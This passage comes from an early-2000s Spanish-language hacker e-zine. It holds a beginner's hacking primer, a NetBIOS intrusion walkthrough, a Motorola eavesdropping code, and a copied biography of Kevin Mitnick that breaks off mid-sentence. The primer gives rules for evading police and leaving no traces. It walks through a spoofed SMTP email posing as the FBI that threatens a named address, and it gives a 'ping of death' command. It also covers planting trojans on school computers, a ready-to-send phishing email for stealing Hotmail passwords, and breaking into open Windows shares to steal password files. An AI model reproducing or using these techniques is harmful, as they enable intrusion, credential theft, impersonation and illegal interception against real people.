internacional, y sus miembros van más allá de las líneas etnicas, raciales, de sexo y 
vocacionales.
Los hackers han sido considerados siempre un grupo marginal en la sociedad. En los colegios, 
lo hackers son vistos como "novatos/lerdos" y "solitarios" sin habilidades sociales; en la 
gran sociedad, son perseguidos por aquellos que están en el poder.
"Soy un hacker. Si alguna vez le digo eso a alguien inmediatamente se asumira que soy maligno, 
vandálico, ladrón, un pseudo-terrorista que sale para tomar los ordenadores del mundo en 
beneficio personal o probablemente para cosechar alguna satisfacción morbosa borrando megas y 
megas de datos valiosos. Se me asocia con el underground informático. Si alguna vez les digo 
eso a alguien, habrí un flujo destellante de asociaciones estúpidas en la mende de esa persona 
entre yo y La Mafia, con Saddam HUssein, Syria, Libya, Abu, NIdal y quien sabe que más. Casi 
universalmente entre la mayoría ignorante, nosotros los hackers somos considerados como 
gamberros peligrosos cuyo único propósito en la vida es el de causar daño como nos sea posible 
en el menor tiempo posible al mayor número de gente. Seguro, hay esos pequeños crios (fisica y 
mentalmente) que se hacen llamar 'hackers' y que concuerdan con las descripciones de arriba. 
Hay también gente que se hace llamar 'seres humanos' que violan, asesinan, engañan, mienten y 
roban cada poco minutos. Significa eso que todos los seres humanos deberían de ir a la cárcel" 
(Toxic Shock, 1990).
Como conclusión, tenemos que los hackers son temidos y respetados. Los hackers no son malignos,
son las personas que les encata el conocimiento, la electrónica, la informatica, trata de 
superarse día a día. POr esta razón su intrusión en sistemas ajenos, pero no los destruye, 
sólo observa. Para que querríamos destruir lo que es más valioso para nosotros... la 
informacion. Además un hacker se preocupa por no dejar huellas, las borrar. Un hacker no busca 
un lucro propio ni tampoco destrozar un sistema, sino demostrarse a sí mismo que es mejor que 
el administrador de ese sistema. Un hacker no nace, se hace, con el conocimiento que adquiere 
día con día. Sin dejarse vencer por los demás, sin sentirse un criminal ya que no lo es...
"El conocimiento es poder"

2. Normas Básicas de un Hacker
A continuación muestro las normas que los hackers deben de seguir para no maltratar el nombre 
de hacker:
1.- Nunca dañes algo intencionadamente. Lo único que conseguirás será buscarte problemas. La 
función del hacker es conocer. 
2.- Modifica solo lo estrictamente necesario para entrar y para evitar ser localizado, o para 
poder acceder otras veces. 
3.- No hackees nunca por venganza ni por intereses personales o económicos. 
4.- No hackees sistemas pobres que no puedan reponerse de un ataque fuerte. Ni tampoco 
sistemas muy ricos o grandes que puedan permitirse gastar dinero y tiempo en buscarte. 
5.- Odia a Telefónica, pero no te metas con ella. 
6.- No hackees ordenadores del gobierno. (El gran hermano te observa) Tal vez sea más 
emocionantes, pero no olvides que la policía trabaja para ellos. 
7.- No comentes con nadie, a menos que sea de total confianza, tus hazañas. (Los más grandes 
hackers de la historia han sido cazados debido a las confesiones de sus novias). 
8.- Cuando hables por Internet, procura ser lo más discreto posible. Todo lo que digas quedara 
almacenado. 
9.- Se paranoico. Una da las características principales de los mejores hackers es la paranoia. 
10.- En los ordenadores que hackees, no dejes ningún dato que pueda relacionarse contigo. Y si 
es posible, ni siquiera "firmes". 
11.- Estudia mucho antes de lanzarte a la práctica. Piensa que eres un novato total, si te 
encuentras con problemas probablemente, tu aventura acabe antes de empezar. 
12.- Nunca dejes de estudiar y de aprender nuevas cosas, el mundo de la informática avanza 
rápidamente, y es necesario mantener un buen ritmo si no quieres quedarte atrás. 
13.- Procura que tus acciones se realicen en servidores lejanos, teniendo en cuenta que cuanto 
más cercanos más rapida será la conexión (bueno, eso dicen), ya que puedes estar durmiendo 
sobre un policía. Podrías iniciar tus actividades de reconocimiento, en servidores donde se 
esté cometiendo algo ilegal. ¿Cres que te denunciarán?, nosotros no lo creemos.

3. Técnicas de un Hacker
En esta parte o sección describiré las técnicas que utilizamos los hacker para hackear :). 
Estas definiciones son algo cortas, pero en próximos textos las definiré ampliamente. Nos las 
escribí por importancia, o sea no creas que porque esta primero ftp es la mas importante, no, 
solo las escribí como me iba acordando.

3.1. FTP
Protocolo de Transferencia de Archivos (Files Transfer Protocol). Bueno pues a este protocolo 
le corresponde el puerto 21 (ver anexo#1 lista de puertos).
Para acceder al FTP, sólo nos vamos a la ventana de MS-DOS y en la unidad escribimos:
c:\>ftp <-- damos enter y cambia el prompt
ftp>_ <-- ahora estamos dentro de ftp y esta esperando un comando
ftp>help <--escribimos help para ver la ayuda y nos deplega lo sig.
Los Comandos se pueden abreviar. Comandos:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
Cada uno de estos comandos tiene una función específica, para saber que función tienen, 
tecleamos:
ftp>? open <-- el simbolo "?" nos sirve para pedir ayuda, y si ponemos un comando enseguida 
nos dice para que sirve
open Conectar a tftp remoto <--esto es lo que aparece eso significa que con open nos 
conectamos a un equipo remoto. Si deseas ver más solo intentalo.
Al entrar al ftp podemos conectarnos como anonimos, asi por ej, ponemos
ftp>open victima.com <--esto de víctima es un servidor remoto.
Luego aparece algo asi
username:anonymous <---aqui es donde pones anonymous
pass: <--te pide un password, solo escribe una direccion de e-mail
Aunque algunos servidores no te dejan hacer mucho como usuario anonimo,hay otros que sí 
sólo es cuestión de buscar.
3.2. Tracert
El tracert es un comando que nos sirve para ver la ruta que sigue un paquete que hayamos 
enviado a un servidor. O sea, nos dice el tiempo que tarda en ir y venir, además te dice por 
que otros servidores pasa este paquete (; aqui puedes encontrar una victima ;). ok tecleemos:
c:\>tracert <---enter y aparecerá la ayuda
Uso: tracert [-d] [-h máximo_de_saltos] [-j lista_de_hosts] [-w tiempo de espera] 
nombre_de_destino
Opciones:
-d No convierte direcciones en nombres de hosts.
-h maximo_de_saltos Máxima cantidad de saltos en la búsqueda del objetivo.
-j lista_de_hosts Enrutamiento relajadode origen en la lista de host
-w tiempo_de_espera tiempo en milisegundos entre intentos

Como la ves así que para trazar la ruta a un host tienes que escribir tracert host. por ej. le 
hacemos un tracert a Microsoft
c:\>tracert www.microsoft.com <--también podrías poner 207.46.230.219 (aparece lo sig.)
Traza a la dirección www.microsoft.akadns.net [207.46.230.219]
sobre un máximo de 30 saltos
1 1350 ms 2121 ms 2704 ms ipt-fj09.proxy.aol.com [205.188.195.106]
2 * * 1704 ms tot-dr5-G3-0.proxy.aol.com [205.188.195.124]
3 391 ms 321 ms 511 ms pop1-dtc.atdn.net [66.185.140.1]
4 657 ms 1089 ms 1397 ms level3-dtc.atdn.net [204.148.102.238]
5 989 ms 747 ms 662 ms ae0-51.mp1.NewYork1.Level3.net [64.159.17.1]
6 1820 ms 2375 ms 2999 ms so-3-0-0.mp1.Seattle1.level3.net [209.247.9.121]
7 1739 ms 369 ms 347 ms gige9-1.hsipaccess1.Seattle1.level3.net [64.159.16.67]
<---- y así va a seguir hasta que llegue a 30 saltos ---->

En la traza anterior podemos ver que el paquete enviado a MIcrosoft para por NewYork y Seattle,
interesante no. A otra cosa el ms significa milisegundos ;)
3.3. Telnet
El telnet nos sirve para conectarnos a un host o servidor remoto de manera que lo emulas y 
pudes trabajar en el. Te pudes conectar a un puerto espefíco para realizar una accion, por ej. 
utilizas el puerto 23 para una conexion normal a telnet, el 25 para enviar correo, el 79 para 
hacer finger, etc.
Esta sección la vamos a hacer con un servidor que esta bien chido. Es el de Free Hacking Zone, 
bueno y diras que chingados es eso. Pues veras en muchos paises el hacking es un delito, 
aunque no haya leyes para ello, así que los cuates de hackerslab decidieron hacer un servidor 
que simulara una empresa X con SO Unix, y asi te conectas via telnet o hyperterminal, y 
empiezas en el level0. Lo que tienes que hacer es ir cogiendote las pass y así subir hasta el 
level17 y todo esto dentro del marco legal. Para más informacion visita 
http://foroshack.cjb.net y metete a la seccion de Free Hacking Zone.
Bueno basta de bla bla y al grano el servidor es drill.hackerslab.org y lo que vamos a hacer 
es enviar correos anonimos. Esto ta chido, para envir un correo a un camarada del FBI 
diciendole que lo estan vigilando y que no tardaran en agarrarlo etc.
Si tienes Windows escribes desde ms-dos:
c:\>Telnet drill.hackerslab.org 25
ok vamos a desglozar esto. Telnet pa abrir el telnet :). drill.hackerslab.org host y 25 es el 
puerto para enviar correo SMTP (Simple Mail Transfer Protocolo, Protocolo de transferencia de 
correo simple).
Si lo escribiste bien se abrira una ventana(en windows) y aparecera:
220 logs-we.proxy.aol.com ESMTP Sendmail 8.10.0/8.10.0; Sat, 12 Jan 2002 12:40:30 -0500 (EST)
luego escribes:
mail from:fbi@eua.org <--aquí escribes de quien es el email, aqui inventas una direccion, por 
cierto no te preocupes si no ves lo que escribes, asi es el telnet. RESPONDE:
250 2.1.0 fbi@eua.org... Sender ok
despues escribes:
rcpt to:julio_acosta@hotmail.com <--Aquí pones el e-mail de la victima. aparece:
250 2.1.5 julio_acosta@hotmail.com... Recipient ok
Despues escribes:
data <--este comando nos sirve para iniciar a escribir en el email. Nos responde:
354 Enter mail, end with "." on line by itself <--nos dice que podemos empezar a escribir y 
terminas el cuerpo del e-mail con un "." sin las comillas. Ok empezamos a escribir:
Mail From:fbi@eua.org
Rcpt to:julio_acosta@hotmail.com
Subject:Andamos tras de ti
Mira estamos viendo tu computadora y vemos que contienes muchos textos y programas hackers, 
ademas hemos visto tu IP en algunos servidores en los que has copiado y borrado informacion, 
tambien apareciste en un log de un host en el cual hiciste ping de la muerte te tenemos en la 
mira asi que no trates de escapar
PD tus archivos ya los tenemos para usarles en tu contra
ATTE
Departament of FBI
United State of America
. <--con este punto indicas que terminates de escribir tu e-mail. y el servidor nos responde:
250 Message accepted for delivery
Bueno como has visto es sencillo mandar e-mails a anonimos, asi que intentalo, pero aqui un 
contra. Algunos servidores mandan tu IP con el e-mail, así que te recomiendo que antes de que 
te pongas a mandar e-mails anonimos a medio mundo te mandes uno a tu cuenta de e-mail para ver 
que pex. Feliz Hack
3.4. Ping
El ping es algo similar al tracert sirve para ver la rápidez de un con la que regresa un 
paquete enviado a un servidor. Pero también sirve para hacer venir abajo a un servidor... pero 
eso te lo digo más tarde. Ok primero escribimos en la ventana de MS-DOS
c:\>Ping <--Damos enter y aparece la ayuda
Uso: ping [-t] [-a] [-n cantidad] [-l tamaño] [-f] [-i TTL] [-v TOS]
[-r cantidad] [-s cantidad] [-j lista de host] | [-k lista de host]]
[-w tiempo de espera agotado] lista de destino
Opciones:
-t Solicita el eco al host hasta ser interrumpido.
Para ver estadísticas y continuar: presione ctrl+inter.
Para interrumpir presione: ctrl+C.
-a Resuelve direcciones a nombre de host.
-n cantidad Cantidad de solicitudes de eco a enviar.
-l tamaño Tamaño del búfer de envíos.
-f No fragmentar el paquete.
-i TTL Tiempo de vida.
-v TOS Tipo de servicio.
-r cantidad Registrar al ruta para esta cantidad de saltos.
-s cantidad Registrar horarios para esta cantidad de saltos.
-j lista de host Ruta origen variable en la lista de host.
-k lista de host Ruta origen estricta en la lista de host.
-w tiempo Tiempo de espera agotado de respuesta en milisegundos.

Bueno pues aqui lo tienes ahora vamos a hacerle un ping a MIcrosoft:
c:\>ping www.microsoft.com
Haciendo ping a microsoft.com [207.46.130.45] con 32 bytes de datos:
Tiempo de espera agotado.
Tiempo de espera agotado.
Tiempo de espera agotado.
Tiempo de espera agotado.
Estadísticas de ping para 207.46.130.45:
Paquetes: enviados = 4, Recibidos = 0, perdidos = 4 (100% loss),
Tiempos aproximados de recorrido redondo en milisegundos:
mínimo = 0ms, máximo = 0ms, promedio = 0ms

Pues que ha pasado, pues que Microsoft no responde ping, ¿por que? porque haciendo el "Ping de 
la Muerte" haces que el servidor caiga, y como nadie quiere a MIcrosoft, mejor se protege. La 
línea es la siguiente, pero antes te digo que no hagas esto ya que te pueden pillar, ademas si
eres un hacker no un destructor, esto te lo digo por tu bien, así que no me hago responsable 
por lo que pase si utilizas la linea siguiente:
c:\>Ping -l 65510 www.servidor.com
3.5. Troyanos
Has oido alguna vez la famosa historia del Caballo de Troya. Bueno pues el la época de la
mitología griega los atenienses estaban en guerra con lo troyanos y no los podía vencer, así 
que los atenienses les regalaron a los troyanos un caballo gigante de madera, el cual iba 
lleno de soldados. Al entrar el caballo a la ciudad los soldados salieron y ganaron la batalla.
Bueno pues los troyanos son programas que se ejecutan en una computadora sin que la persona lo 
sepa, abriendo un puerto a la escucha, para que otra persona entre al sistema. Esto se hace 
por medio de Ingenieria Social o contacto físico con el ordenador.
En la computadora victima se pone el programa del servidor, mientras que en tu maquina 
ejecutas el cliente. Si la victima tiene activo el troyano y sabes su IP (algunos troyanos 
tienen rastradores de puertos que te indican que computadoras tienen activo el troyano) te 
conectas a su máquina y ejecutas los comandos del troyano, por ej.: Abrir y cerrar el CD-Rom, 
pillar los password, copiar informacion, y lo más vil y bajo: formatearle su disco o borrarle 
su informacion (eso es de LAMMERS).
Bueno en cualquier caso los troyanos los puedes mandar a tu victima por e-mail o por irc 
dicendole que es un salvapantallas o algo así, y si lo ejecuta ya chingaste, ya tienes su 
computadora a tu dispocion.
Otra manera es ir por ejemplo a las computadoras de tu escuela y poner el troyanito por ahi en 
una carpeta oculta y con un nombre despistado como "Tarea1" o algo así y lo ejecutas, te vas a 
tu casa y nadie se dio cuenta. Te conectas desde tu casa y le pillas las claves de internet, 
etc. Bueno eso de pillar pass por troyanos lo dejo pa otra ocasión tal vez haga un manual 
proximamente.
Algunos de los troyanos más utilizados son netbus, Back Orifice, sub7, etc. Aunque varias 
personas los utilizan sin conocimientos y sin ningun otro fin mas que el de joder no el de 
conocer esas personas son unos vils lammers. Pero si los utilizas din joder solo conecer veras 
que es mejor que destruir.
3.6. Ingeniería Social
Es la manera de convencer a alguien de que nos procporcione datos que nos sirvan para el hack, 
por ej. que nos proporciene contraseñas de correo, internet o la contraseña de su empresa 
(puede funcionar). Además la ingeniería social no es sólo utilizado por hackers, sino tambien 
por el resto del mundo underground como crackers, phreakins, cardins, etc.
Por ejemplo queremos saber el password de un usuario de hotmail y su e-mail es: 
julio_acosta@hotmail.com (el mismo mail que en telnet, no se porque, si existe este e-mail 
por favor disculpeme si lo ofendo no se me ocurrio otro).
Bueno pues le enviamos un e-mail anonimo (ya sabes como hacerlo, sino vuelve a leer lo del 
telnet) con una direccion algo asi como admin@hotmail.com o tambien root@passport.hotmail.com 
o lo que se te ocurra y le dices por el e-mail:

------------------------------------

Estimado usuario de hotmail:
Lamentamos informarle que haces dos días <--pones una fecha pa apantallar--> un hacker 
irrumpio en nuestro servidor y robo algunos passwords de nuestra base de datos, además de que 
borro los password de nuestra base de datos, dejandonos sólo con los nombres de usuario, y 
entre ellos estuvo usted. 
Así que le pedimos que nos mande su contraseña con su nombre de usuario de inmediato para 
poder restaurar la base de datos y asi no quede borrado de la misma y no pueda acceder a su 
cuenta de hotmail. Le pedimos que envie la informacion a la siguiente direccion:
recuperar_claves@hotmail.com <--- creamos esta cuenta en hotmail para hacerlo mas creible. O 
creas la que deses pero que se mire algo del tema
Hay una buena noticia, hemos capturado al hacker pero lamentablemente borro los ficheros y no 
recuperamos su password.
Administrador de Hotmail
Andres Solorzano Villegas

<--inventas un firmilla o algo-->
-------------------------------------
Si todo sale bien recibiras un e-mail en tu cuenta recuperar_claves@hotmail.com el nombre de 
usuario y clave de esta persona, si no quiere decir que no calló. En estos tiempos es dificil 
que alguien caiga pero a veces si caen, tambien caen facilmente los neofitos totales. POr ej. 
un compañero de tu salón solamente se conecta a internet para chatear en el mIRC, y sabes que 
se conecta con prodigy, que haces le mandas un e-mail anonimo diciendo que eres el 
administrador de prodigy le dices algo parecido en el e-mail anterior, lo del hacker y eso y 
que te mande todos los datos, y ya. Es más fácil que esos caigan.
Hay muchisimo más formas de hacer ingenieria social, pero no las mencionare aqui por falta de 
tiempo.


***********************
-----------------------
ESCUCHAS CON UN MOTOROLA
-----------------------
                  DonGatø 
***********************


Hola, estoy a punto de mostrarles una tecnica excelente para poder escuchar lo que hacen los 
demas (esto es sinonimo de no tener vida les aclaro), lo unico que vas a necesitar es un 
telefono celular de marca MOTOROLA!!!!!!, porque no quiero un mail de alguno que no le salio 
con un Nokia ok, bueno, y un dedo u objeto que sirva para marcar.
Empecemos, lo que vamos a hacer ahora es entrar al modo de programacion del telefono, para 
esto tenes que marcar 

FCN 00 ** 83786633 STO

Hasta aca vamos?, bueno, entramos ahroa que hay que hacer? el que sepa algo de 
telecomunicaciones o radio sabra que todo lo que viaja tiene una frecuencia, eso es lo que 
tenemos que hacer ahora, es encontrar una frecuencia, todos los textos te dicen la 779 o 333 o 
800, pero no sirven, si estas en Rosario, Argentina proba con 300 ;) esa si es de la buena, 
pero donde ponemos este numero? 

#11xxx #02

Me imagino que se habran dado cuenta que tienen que cambiar las "xxx" por el numero de la 
frecuencia, quedaria

#11300 #02

listo, y a tener paciencia, siempre alguien hay, los dejo, ahh, me olvidaba para sacar elmodo 
este marca #01 y el telefono se reinicia, hasta la proxima

By DonGatø 2003


***********************
-----------------------
NETBIOS
-----------------------
                  BattleKat
***********************



Buenas, quiero poner una forma ya clasica de ataque hacker, lo mas basico que se me ocurrio, 
desde ya quiero decirle a Hacker's experimentados, que esta tecnica que voy a describir, puede 
tener errores, ya que no es un texto para profesionales, sino para Newbies que quieres empezar 
en esto.

Este ataque usa los recursos compartidos bajo Windows, no se explota ningun bug del sistema, 
sino que usaremos redes de trabajo, de cybers, que es solo para el transpaso de archivos entre 
maquinas de una LAN.

1. Encontrar la viktima:

Hay cientos (sino miles) de victimas potenciales en Internet, no mas nos basta con entrar en
un chat con comandos IRC (como puede ser el mIRC, PIRCH, o cualquier chat bajo IRC).
Que debemos hacer?, mirar los nick que se encuentren en el canal en ese momento, por ejemplo 
"JuanCarlos" (dato para hacer la nota mas practica), esta va a ser nuestra victima de hoy.

2. Averiguar el IP:


Este número, llamado IP, es asignado por el Network Information Center, en los Estados Unidos, 
y esta formado por 32 bits, de manera que va desde 0 hasta 4,294,967,296. Cada número IP se 
expresa generalmente como una serie de cuatro octetos (series de ocho bits), así que una 
número IP se ve de la siguiente forma: 200.13.16.5. 


Ok, ya tenesmos la definicio de IP y la victima, ahora debemos ir al prompt del IRC y teclear:

/DNS "nickdelavictima" (sin las comillas)

en nuestro caso

/DNS JuanCarlos

y buscamos en la parte de "Status" un numero IP (xxx.xxx.xxx.xxx).

ahora, con el numero IP en la mano, vamos nuevamente al prompt del IRC y tecleamos 
"/RUN command.com" (esto lo que hara sera habrir una ventana de DOS) aqui escribimos 

nbtstat -a xxx.xxx.xxx.xxx (en numero IP que habiamos conseguido)

lo mas probable que nos salga es 

Host not found

Los que significa que debemos volver al chat a buscar otra victima, ya que esta no tiene el 
netbios activo :(

probamos de nuevo hacemos: 

nbtstat -a xxx.xxx.xxx.xxx

y sale algo asi

   Name               Type         Status 

--------------------------------------------- 

MAQUINA10      <00>  UNIQUE      Registered 

CYBER_TUMAMA   <00>  GROUP       Registered 

MAQUINA10      <03>  UNIQUE      Registered 

Bueno, lo que sabemos aca a simple vista es que la maquina se llama "MAQUINA10" (por la primer 
entrada <00>) y el nombre del grupo es "CYBER_TUMAMA", pero, en este caso lo que paso es que 
no tenemos una entrada <20>, que es la que nos informa que podemos entrar, asi que a probar de 
nuevo:

Y nos sale algo asi:

   Name               Type         Status 

--------------------------------------------- 

M12         <00>  UNIQUE      Registered 
 
CYBERIA     <00>  GROUP       Registered 

M12         <03>  UNIQUE      Registered 
   
M12         <20>  UNIQUE      Registered  <--- aqui vemos una entrada <20> :^)

En este caso la maquina esta abierta para la entrada (Por fin)

Debo aclararte que tienes que tener una conexión que estés usando en propiedades la casilla de 
NetBEUI y Conectarse a la red activadas, luego ve al Panel de Control y en Red, comprueba que 
tienes Compartir impresoras y archivos activados, de otra manera no hay forma que encuentras 
alguna maquina abierta.

3. Escribir nuestra lista de Host:

Ok ya tenemos la victima, la IP de la victima, el nombre de la maquina y el nombre del grupo 
de trabajo.

Abramos el archivo c:\windows\lmhosts (sin extension, puede que no exista, en este caso lo 
creamos, no confundirse con el lmhosts.sam que es un ejemplo y no nos servira para nada), un 
vez abierto, agragamos la linea

xxx.xxx.xxx.xxx NOMBRE

donde xxx.xxx.xxx.xxx es el IP de la victima y nombre es la primer entrada <00> UNIQUE (En 
nuestro caso el nombre es M12).

4. Actualizar el netBIOS de la maquina:

Esto es muy simple, pero importantisimo, si se nos pasa esto no podremos hacer mas que 
ruido :^), el netBIOS se actualiza escribiendo en el prompt de DOS

nbtstat -r

y nos aparecera algo asi

Successful purge and preload of the NBT Remote Cache Name Table.

que nos indica que la actualizacion a concluido satisfactoriamente.

5. Como entrar:

Ok, primero podemos ver que es lo que comparte conmigo, con el comando net view

net view \\NOMBRE

y nos saldra...

Recursos compartidos \\NOMBRE
  

Compartido   Tipo         Comentario 

--------------------------------------- 

CDROM        Disco 

C            Disco 

IMPRES       Impresora 

(NOMBRE es el nombre de la maquina, obvio)

ynos muestra que compartimos el CDROM, el disco c yla impresora, jajaja.

para entrar solo tiemes que ir a Inicio/Buscar/Pc... y ponemos el NOMBRE de la maquina, saldra 
que encontro una maquina, le hacemos doble clic y estamos dentro.

Dependiendo del grado de acceso que tengas podras hacer diversas cosas, como por ejemplo 
plantar troyanos para ingresar mas facil la proxima vez, virus, robar archivos como *.PWL, 
Logs de IRC, MP3, lo que quieras, o si se quiere borrarles todo (pero tampoco somos tan malos),
y lo que se te ocurra, algo muy interesante que lei en un archivo publicado por DarkAngel, es 
firmar, dejar un txt en su escritorio (si no has tocado nada) con la fecha y la hora XDD.

Bueno, espero que le haya ayudado en algo y hasta la proxima

BattleKat (R) 2003



***********************
-----------------------
BIOGRAFIA
-----------------------
                  _^SIAKO^_
***********************


Bueno, en cada e-zine vamos a poner este "lugar" que se llama biografia donde pondremos la 
biografia de hackers famosos.
Estas biografias van a ir siendo sacadas de la red, y no son (casi nunca) escritas por hackers
pertenecientes a SudHack.
A continuación vamos a ver la vida del hacker mas fomoso del mundo.
Kevin Mitnick

 El Chacal de la Red
 *******************

    La Historia del Chacal de la Red

    Como Hacker la carrera de Kevin Mitnick comenzo a los 16 aÑos, cuando -
    obsesionado por las  redes  de  computadoras-rompio  la  seguridad  del 
    sistema administrativo de su colegio 

    Escrito por: _^SIAKO^_

    Mr. Mitnick.

    Todo  aquel  que  sea conceptualizado como un Internauta se caracteriza 
    por utilizar un telefono,  un modem y una computadora para muchos fines 
    diferentes:  Divertirnos,  informarnos,  estudiar,  cocinar, planificar 
    viajes y otras actividades que amplian nuestro  quehacer  diario.  Para 
    Kevin  Mitnick  el  quehacer  diario  en  sus  ultimos diez a¤os fue el 
    explorar y "explotar" computadoras ajenas y  sistemas  telefonicos.  Su 
    profesion?  "Hacker" de nacimiento. Este "terrorista electronico", como 
    lo cataloga el Departamento de Justicia de los Estados Unidos, conocido 
    en los medios como el "Condor",  fue capaz de crear numeros telefonicos 
    imposibles  de facturar (para la compa¤ia telefonica el era James Bond, 
    con un numero que terminaba en 007),  pudo apropiarse de 20.000 numeros 
    de  tarjetas  de credito de habitantes de California y burlarse del FBI 
    por mas de dos  a¤os  con  solo  un  telefono  celular  alterado  y  un 
    computador   portatil.   Es  la  peor  pesadilla  de  las  empresas  de 
    telefonia.  

    Es  sospechoso  de  robar  el  software  de  mas  de  media  docena  de 
    fabricantes  de telefonos celulares y tenia el control de tres oficinas 
    centrales  de  telefonos  en  Manhattan  y  de  todos  los  centros  de 
    conmutacion  de California,  dandole la habilidad de escuchar cualquier 
    conversacion telefonica o,  si  no  eras  una  persona  de  su  agrado, 
    modificar  el  telefono  de  tu  casa  de tal manera que,  cada vez que 
    levantaras  el  auricular,  una  grabadora  pedia  que  depositaras  25 
    centavos.  

    ¨Como se forma un Hacker?

    Como  Hacker,  la  carrera  de Mitnick tiene sus inicios en 1980 cuando 
    apenas contaba 16 a¤os y,  obsesionado por las redes  de  computadoras, 
    rompio  la seguridad del sistema administrativo de su colegio,  pero no 
    para alterar sus notas, lo hizo "solo para mirar".  

    Su bautizo como infractor de la ley fue en 1981.  Junto  a  dos  amigos 
    entro  fisicamente  a  las  oficinas de COSMOS de Pacific Bell.  COSMOS 
    (Computer System for  Mainframe  Operations)  era  una  base  de  datos 
    utilizada   por   la   mayor   parte   de   las  compa¤ias  telefonicas 
    norteamericanas para controlar el registro de llamadas.  Una vez dentro 
    de las  oficinas  obtuvieron  la  lista  de  claves  de  seguridad,  la 
    combinacion  de  las  puertas de acceso de varias sucursales y manuales 
    del sistema COSMOS.  La informacion robada tenia un valor equivalente a 
    los 200 mil dolares. Fueron delatados por la novia de uno de los amigos 
    y  debido  a  su  minoria de edad una Corte Juvenil lo sentencio a tres 
    meses de carcel y a un a¤o bajo libertad condicional. Luego de cumplido 
    el periodo de tres meses el  oficial  custodio  encargado  de  su  caso 
    encontro  que  su  telefono  fue  desconectado  y  que  en  la compa¤ia 
    telefonica no habia ningun registro de el. Sus objetivos iban creciendo 
    a cada paso y en 1982 entro ilegalmente,  via modem,  a la  computadora 
    del  North  American  Air Defense Command en Colorado.  Antes de entrar 
    altero el programa encargado de rastrear la procedencia de las llamadas 
    y desvio el rastro de su llamada a otro lugar.  El  FBI,  creyendo  que 
    habia  hallado  a  Mitnick,  ayanando  la  casa de unos inmigrantes que 
    estaban viendo television.  Un a¤o mas tarde  fue  arrestado  de  nuevo 
    cuando era estudiante de la Universidad del Sur de California.  En esta 
    ocasion entro ilegalmente a ARPAnet  (la  predecesora  de  Internet)  y 
    trato de accesar a la computadora del Pentagono. Lo sentenciaron a seis 
    meses de carcel en una prision juvenil en California.  

    En  1987,  luego  de  tratar  de  poner su vida en orden,  cayo ante la 
    tentacion y fue acusado,  en  Santa  Cruz  California,  de  invadir  el 
    sistema  de la compa¤ia Microcorp Systems.  Lo sentenciaron a tres a¤os 
    de  libertad  condicional  y  luego  de  la  sentencia  su   expediente 
    desaparecio de la computadora de la policia local.  Luego busco trabajo 
    en lo que mejor sabia hacer y solicito empleo en  el  Security  Pacific 
    Bank  como  encargado de la seguridad de la red del banco.  El banco lo 
    rechazo por sus antecedentes penales y  Mitnick  falsifico  un  balance 
    general  del  banco  donde  se  mostraban  perdidas por 400 millones de 
    dolares  y  trato  de  enviarlo  por   la   red.   Afortunadamente   el 
    administrador  de  la  red detuvo el balance antes de que viera la luz. 
    Ese mismo a¤o inicio el escandalo que lo lanzo a la fama. Durante meses 
    observo  secretamente  el  correo  electronico  de  los  miembros   del 
    departamento  de  seguridad  de  MCI Communications y Digital Equipment 
    Corporation para conocer como estaban protegidos las computadoras y  el 
    sistema telefonico de ambas compa¤ias.  

    Luego  de  recoger  suficiente  informacion se apodero de 16 codigos de 
    seguridad de MCI y junto a un amigo,  Lenny DiCicco,  entraron a la red 
    del  laboratorio  de  investigaciones de Digital Corporation,  conocida 
    como Easynet.  Ambos Hackers querian obtener un a copia  del  prototipo 
    del  nuevo  sistema  operativo de seguridad de Digital llamado VMS.  El 
    personal de seguridad de  Digital  se  dio  cuenta  inmediatamente  del 
    ataque y dieron aviso al FBI, y comenzaron a rastrear a los hackers.  

    Mitnick fue un mal complice y,  a pesar de que habian trabajado juntos, 
    trato de echarle toda la culpa a DiCicco haciendo llamadas anonimas  al 
    jefe  de este que trabajaba en una compa¤ia de software como tecnico de 
    soporte. Lleno de rabia y frustracion DiCicco le confeso todo a su jefe 
    que los denuncio a Digital y al FBI.  

    Mitnick fue arrestado  en  1988  por  invadir  el  sistema  de  Digital 
    Equipment.  La empresa acuso a Mitnick y a DiCicco ante un juez federal 
    de causarles da¤os por 4 millones de dolares en el robo de  su  sistema 
    operativo. Fue declarado culpable de un cargo de fraude en computadoras 
    y de uno por posesion ilegal de codigos de acceso de larga distancia.  

    Adicional  a  la  sentencia  el fiscal obtuvo una orden de la corte que 
    prohibia a Mitnick el uso del telefono en la prision  alegando  que  el 
    prisionero  podria  obtener  acceso  a  las  computadoras  a  traves de 
    cualquier telefono.  A peticion de Mitnick el juez lo autorizo a llamar 
    unicamente a su abogado,  a su esposa,  a su madre y a su abuela y solo 
    bajo supervision de un oficial de la prision.  

    Este caso produjo revuelo en los Estados Unidos,  no solo por el  hecho 
    delictivo  sino  por  la  tactica  que  utilizo la defensa.  Su abogado 
    convencio  al  juez  que  Mitnick  sufria  de  una  adiccion  por   las 
    computadoras  equivalente  a  la  de un drogadicto,  un alcoholico o un 
    apostador.   Gracias  a  esta  maniobra  de  la  defensa  Mitnick   fue 
    sentenciado a solo un a¤o de prision y al salir de alli debia seguir un 
    programa  de  seis  meses para tratar su "adiccion a las computadoras".  
    Durante su tratamiento le fue prohibido  tocar  una  computadora  o  un 
    modem y llego a perder mas de 45 kilos.  

    Para  1991  ya era el Hacker que habia ocupado la primera plana del New 
    York Times y uno de sus reporteros,  John Markoff,  decidio escribir un 
    libro de estilo Cyberpunk narrando las aventuras de Mitnick. Al parecer 
    a  Mitnick  no  le gusto el libro ya que luego de salir a la venta,  la 
    cuenta en Internet de Markoff  fue  invadida,  cambiando  su  nivel  de 
    acceso,  de  manera  de  que  cualquier persona en el mundo conectada a 
    Internet podia ver su correo electronico.  En 1992, y luego de concluir 
    su programa,  Mitnick comenzo a trabajar en una agencia de  detectives. 
    Pronto  se  descubrio  un manejo ilegal en el uso de la base de datos y 
    fue objeto de una investigacion por parte del FBI quien  determino  que 
    habia  violado  los  terminos de su libertad condicional.  Allanaron su 
    casa pero habia desaparecido sin dejar rastro alguno.  Ahora Mitnick se 
    habia convertido en un Hacker profugo.  

    El  fiscal no estaba tan equivocado cuando pidio la restriccion del uso 
    del  telefono.  Tambien  en  1992,  el  Departamento  de  Vehiculos  de 
    California  ofrecio  una  recompensa  de  1  millon  de dolares a quien 
    arrestara a Mitnick por  haber  tratado  de  obtener  una  licencia  de 
    conducir  de  manera  fraudulenta,  utilizando  un  codigo  de acceso y 
    enviando sus datos via fax.  

    El Fin

    Luego de convertirse en profugo de la  justicia  cambio  de  tactica  y 
